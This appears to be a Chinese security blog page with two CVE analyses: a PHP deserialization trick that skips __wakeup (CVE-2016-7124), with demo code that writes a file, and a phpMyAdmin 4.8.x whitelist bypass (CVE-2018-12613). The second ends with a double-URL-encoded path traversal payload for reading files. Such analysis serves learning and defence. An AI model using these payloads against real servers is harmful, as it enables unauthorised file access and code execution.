标签 cve 下的文章

CVE-2016-7124 反序列化绕过__wakeup执行

0x01 基本原理

CVE-2016-7124,简单来说就是当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行,Demo如下:

0x02代码演示

<?php
/**
 * Created by PhpStorm.
 * User: 徐超
 * Date: 2018/10/20
 * Time: 下午 08:15
 */

class test{
    var $a = "phpinfo();";
    public function __wakeup()
    {
        $this->a = null;
        // TODO: Implement __wakeup() method.

    }
    public function __destruct()
    {
        // TODO: Implement __destruct() method.
        $fp = fopen("D:\\wakeup.php","w");
        fputs($fp,$this->a);
        fclose($fp);
    }

}
// $b = new test();
//$c = serialize($b);

$d = 'O:4:"test":2:{s:1:"a";s:16:"<php? phpinfo();";}'; #对象属性个数值大于真实值,跳过__wakeup执行,写入文件内容
//$d = 'O:4:"test":1:{s:1:"a";s:10:"<?php phpinfo();";}';  #正常生产的php代码-->>文件内容为空
$e = unserialize($d);
echo "\n\r";

CVE-2018-12613 PhpMyadmin后台文件包含分析

描述:

一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。
该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。
攻击者必须经过身份验证,但在这些情况下除外:
$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码
$ cfg ['ServerDefault'] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码

受影响版本:

phpMyAdmin 4.8.0和4.8.1受到影响。

漏洞分析

/index.php

//line 55-63
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

if区间一共有五个判断:

  1. 是否存在target参数
  2. target参数是否为字符串
  3. 值不能以index开头
  4. 值不能出现在$target_blacklist内
  5. Core类的checkPageValidity方法判断

如果通过判断则包含参数所指定的文件。

前几个判断可以忽略,重要的是后面两个判断,先看第一个

/index.php
//line 50-52
$target_blacklist = array (
    'import.php', 'export.php'
);

$target_blacklist中的数组为import.php 和 export.php,只要target的值不是这两个就可以

我们看下一个判断

首先找到Core类的checkPageValidity函数:

//443-478
public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist;
    }
    if (! isset($page) || !is_string($page)) {
        return false;
    }
    if (in_array($page, $whitelist)) {
        return true;
    }
    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }
    $_page = urldecode($page);
    
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }
    return false;
}

checkPageValidity函数里又是五个判断:

  1. $whitelist为空则引用静态声明的$goto_whitelist
  2. 如果$page没有被定义过或者$page不为字符串则return false
  3. $page存在$whitelist中的某个值则返回true
  4. $_page存在$whitelist中的某个值则返回true
  5. 经过urldecode函数解码后的$_page存在$whitelist中的某个值则返回true

我们来逐行分析:

首先index.php调用checkPageValidity参数时并没有传第二个参数所以会进入此参数的第一个if区间,我们来看一下$goto_whilelist

public static $goto_whitelist = array(
        'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
        'db_importdocsql.php',
        'db_multi_table_query.php',
        'db_structure.php',
......
        'user_password.php',
    );

$goto_whilelist定义了些可以被包含的文件名(省略了一部分)

第二个if直接跳过我们来看第三个if区间,如果$page如果等于$goto_whilelist的某个值则return真。

phpmyadmin的开发团队考虑的很全面,想到了会存在target的值后面再跟参数的情况,于是有了第三个判断:

$_page = mb_substr(
    $page,
    0,
    mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
    return true;
}

$_page为 以?分割然后取出前面的字符串再判断值是否存在与$goto_whilelist某个数组中。

这个判断的作用是,如果target值带有参数的情况下,phpmyadmin也能正确的包含文件。

也正是因为phpmyadmin团队考虑的太全面了,才会出现此漏洞......

$_page = urldecode($page);
$_page = mb_substr(
    $_page,
    0,
    mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
    return true;
}

payload读取文件

后面又将$page参数用urlencode解码再进行以?分割取出前面的值做判断。

那么传入payload: url + ?target=db_sql.php%253f/../../test.txt

读取test.txt

//%253f是?号的二次url编码
preView